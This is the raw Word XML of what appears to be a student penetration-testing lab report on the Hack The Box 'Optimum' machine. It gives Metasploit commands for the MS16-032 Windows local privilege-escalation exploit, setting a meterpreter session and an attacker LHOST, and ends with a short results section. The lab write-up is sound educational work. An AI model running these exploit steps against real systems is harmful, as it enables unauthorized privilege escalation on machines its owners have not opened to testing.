      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit/windows/local/ms16_032_secondary_logon_handle_privesc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>’.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 options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exploit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run.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options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‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ session that we put in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>background )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the LHOST </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>( attacker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IP )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16565F9D" w14:textId="77777777" w:rsidR="006D2FCA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7568" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08CEF69A" wp14:editId="06D7147E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>982662</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>151683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5647349" cy="255165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349" cy="255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ED39E" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="225"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>can do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that by using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A29161D" w14:textId="77777777" w:rsidR="006D2FC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1"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set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session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65421579" w14:textId="77777777" w:rsidR="006D2FC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i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;HTB_TUN_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333EB2FA" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:ind w:left="0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598080" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0439CF23" wp14:editId="38CC2F62">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>167081</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5716707" cy="62007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07" cy="62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4E981" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="006D2FCA">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1275" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455EB4AF" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D46679A" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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0C4288E3" wp14:editId="6F8A2E79">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>167273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5728472" cy="635965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472" cy="6359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16A77" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="267"/>
      </w:pP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privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E4A2B" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62504609" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9BAF1F" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9A08A9" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="006D2FCA">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="174"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4B116A" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7D711" w14:textId="77777777" w:rsidR="006D2FCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="186" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>VAPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>assessment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'Optimum'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>successfully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>critical vulnerabilities, facilitating unauthorized access and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006D2FCA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78C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="498E44BE"/>
    <w:lvl w:ilvl="0" w:tplc="BFBE8458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7EB96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267018D2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86749358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4192D262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B720DBBC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73A4BF02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292A8890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6194BF1E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num w:numId="1" w16cid:durableId="157505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CA"/>
    <w:rsid w:val="0039074C"/>
    <w:rsid w:val="004735F7"/>
    <w:rsid w:val="004F273E"/>
    <w:rsid w:val="005B15EE"/>
    <w:rsid w:val="006D2FCA"/>
    <w:rsid w:val="008A6F8A"/>
    <w:rsid w:val="00A72C6B"/>
    <w:rsid w:val="00D6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8F30"/>
  <w15:docId w15:val="{9BAF1D8A-8C31-4F2E-81C5-F0A84BC0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right="126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2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help.hackthebox.com/en/articles/5185687-introduction-to-lab-access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aayush singh 156</dc:creator>
  <cp:lastModifiedBy>AAYUSH SINGH (RA2311030010156)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2026-02-20T11:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-23T16:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-23T16:24:00Z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for Microsoft 365</vt:lpwstr>
  </property>
</Properties>
</file>